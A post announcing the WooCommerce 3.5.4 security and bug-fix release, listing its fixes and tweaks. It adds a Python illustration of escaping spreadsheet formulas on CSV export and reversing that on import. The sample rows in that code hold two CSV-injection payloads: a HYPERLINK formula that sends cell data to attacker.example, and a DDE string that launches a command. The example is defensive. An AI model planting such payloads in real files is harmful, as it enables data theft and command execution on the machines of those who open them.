WooCommerce 3.5.4 Security and Fix-Update

WooCommerce 3.5.4, a security and bug-fix release, was published on January 21. It contains over 50 fixes, several of them security-related. The vulnerabilities affect WooCommerce 3.5.3 and earlier and concern file upload sanitization and the disclosure of customer user names. In the same release WooCommerce hardened the generation of order keys and addressed the design flaw that RipsTech outlined, which manifests when the WooCommerce plugin is deactivated.
To prevent attacks through these vulnerabilities, install the update as soon as possible.

Fixes

  • Unescape CSV formulas in product attributes in CSV importer/exporter.
  • Remove use of non-existing WC_REST_Dev_Setting_Options_Controller class.
  • Fix edge case where get_plugins would not have the custom WooCommerce plugin headers if get_plugins was called early.
  • Prevent PHP warning when deprecated user meta starts with uppercase.
  • Fixed support for multiple query parameters translated to meta queries via REST API requests.
  • Prevent PHP errors when trying to access non-existent report tabs (WooCommerce > Reports > Stock).
  • Filter by attributes dropdown placeholder text should not be wrapped in quotes.
  • Apply sale price until end of closing sale date.
  • Allow empty schema again when registering a custom field for the API.
  • Don’t display escaped html on checkout when javascript is disabled.
  • Fixed formatted address in uppercase for languages that use accents.
  • Reload the cart page when the cart is empty when there is a hash in the URL.
  • Do not schedule duplicate webhooks within 10 minutes of each other to maintain previous behavior.
  • Return correct next scheduled date for items in queue by fixing date instantiation in WC_Action_Queue::get_next().
  • Allow products to use default low stock threshold.
  • Fix 0 value attribute permalink calculation, property population in REST api.
  • Ensure cache delete on coupon trash or delete.
  • Ensure product parent exists before getting its image.
  • Correctly use wildcard character on email restrictions on coupons.
  • Avoid warnings in the Action Scheduler library on PHP 5.2.
  • Don’t include product in BreadcrumbList structured data so Google will recognize stand-alone Product structured data.
  • Fix Product widget showing hidden products when hide out of stock was enabled.
  • Run webhook status updates through new wc_is_webhook_valid_status functions when doing API requests.
  • Correct quote handling in tax class names.
  • Prevent style side-effects on notices on the Extensions pages.
  • Check stock status of items when ‹ordering again› from the account page.
  • Improve rounding when rounding at subtotal level in cart.
  • Restores an opportunity to print non-cart related notices that a few extensions are relying on.
  • Correct order item meta alignment in order emails when using an RTL language.
  • Fix bug where product status was erroneously going to draft status in some circumstances on new published variable products.
  • Load customer data for logged in users regardless of being member of sub-site to avoid errors.
  • Use slug sanitization on product export category slugs for better foreign character support.
  • Correct item subtotal rounding when multiple taxes are applied so it matches the cart.
  • Prevent fatal errors when retrieving network orders for sites that do not have WooCommerce activated.
  • Numerous bug fixes around checkout field locales on first load.
  • Correct position of admin notices on my-account pages.
  • Fixed padding of addresses in email template.
  • Prevent payment method descriptions sliding up/down if selected after ajax updates.
  • Fix product updating on import for SKUs with special characters.
  • Make product edit form aware publish was pressed.
  • Filter out buttons from the onRowClick event on the Orders list view page.
  • Update «Filter Products by Attribute» widget when product stock quantity changes via «Quick Edit» or WC API.
  • Strip hash from URL when reload refunds in the dashboard.
  • Fix import & export of newline characters in product description fields.
  • Product export by unicode product categories.
  • Issue where images offloaded to external servers caused errors and broken images when changing aspect ratios.
  • Remove block comments from shop page description.
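The first item in the list above refers to CSV formula injection: a spreadsheet application treats a cell that begins with `=`, `+`, `-` or `@` as a formula, so an exporter that writes attacker-controlled product data (for example an attribute value entered through a vendor or review form) verbatim can hand the shop manager who opens the file a formula that runs on their machine. The usual defence is to prefix such cells with an apostrophe on export, and the fix is about reversing that prefix on import so an escaped value round-trips unchanged. The Python below is an added illustration of that escape/unescape pair; it is not WooCommerce's own code, and the product rows, the prefix set and the function names are assumptions made for the example.

```python
import csv
import io

# Leading characters that make Excel/LibreOffice evaluate a cell as a formula.
# Tab and carriage return are included because some applications strip them
# before checking the first character (assumed prefix set, not WooCommerce's).
FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r")


def escape_formula(value: str) -> str:
    """Neutralise a cell that a spreadsheet would evaluate as a formula.

    A leading apostrophe tells the spreadsheet to treat the cell as text.
    """
    if value.startswith(FORMULA_PREFIXES):
        return "'" + value
    return value


def unescape_formula(value: str) -> str:
    """Reverse escape_formula() on import so a previously escaped value round-trips.

    Only strips the apostrophe when what follows would have been escaped;
    a plain value that legitimately starts with an apostrophe is left alone.
    """
    if len(value) > 1 and value[0] == "'" and value[1:].startswith(FORMULA_PREFIXES):
        return value[1:]
    return value


# Constructed sample rows: (sku, name, attribute). The attribute values are
# classic CSV-injection payloads, written here as plain strings.
CONSTRUCTED_ROWS = [
    ("SKU-1", "Plain shirt", "=HYPERLINK(\"http://attacker.example/?\"&A1,\"open\")"),
    ("SKU-2", "Hoodie", "+cmd|' /C calc'!A0"),
    ("SKU-3", "Cap", "Blue"),
]


def export_products(rows) -> str:
    """Write rows to CSV text with every cell passed through escape_formula()."""
    buf = io.StringIO()
    writer = csv.writer(buf)
    writer.writerow(["sku", "name", "attribute"])
    for row in rows:
        writer.writerow([escape_formula(cell) for cell in row])
    return buf.getvalue()


def import_products(text: str):
    """Parse CSV text and undo the export escaping on every cell."""
    reader = csv.DictReader(io.StringIO(text))
    return [{key: unescape_formula(val) for key, val in row.items()} for row in reader]


def roundtrip_ok(rows) -> bool:
    """True if export followed by import reproduces the original cell values."""
    imported = import_products(export_products(rows))
    return [(r["sku"], r["name"], r["attribute"]) for r in imported] == list(rows)


if __name__ == "__main__":
    print(export_products(CONSTRUCTED_ROWS))
    print("round-trip intact:", roundtrip_ok(CONSTRUCTED_ROWS))
```

Two caveats a practitioner should keep in mind. First, the apostrophe prefix also turns legitimately negative numeric cells such as `-5` into text, which is the accepted trade-off of this scheme. Second, the unescape step must be at least as strict as the escape step: if the importer strips any leading apostrophe, a value that was never a formula but happened to start with one is silently changed, which is why `unescape_formula` checks what follows the apostrophe.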

Tweaks

  • Allow limited html in woocommerce_rating_filter_count filter.
  • Remove ‹on-hold› orders from admin tax reports for more logical reporting.
  • Remove payment phrases from processing emails.
  • Removed display of cost for local pickup when free.

Developer Features – REST API

  • Fix 0 value attribute permalink calculation and property population in the REST API.
  • Fixed support for ordering results by slug.
  • Removed extra inherited filters from product endpoint in variations endpoint.

Remember to create a backup before installing updates.

(Picture Courtesy of Yuri Samoilov)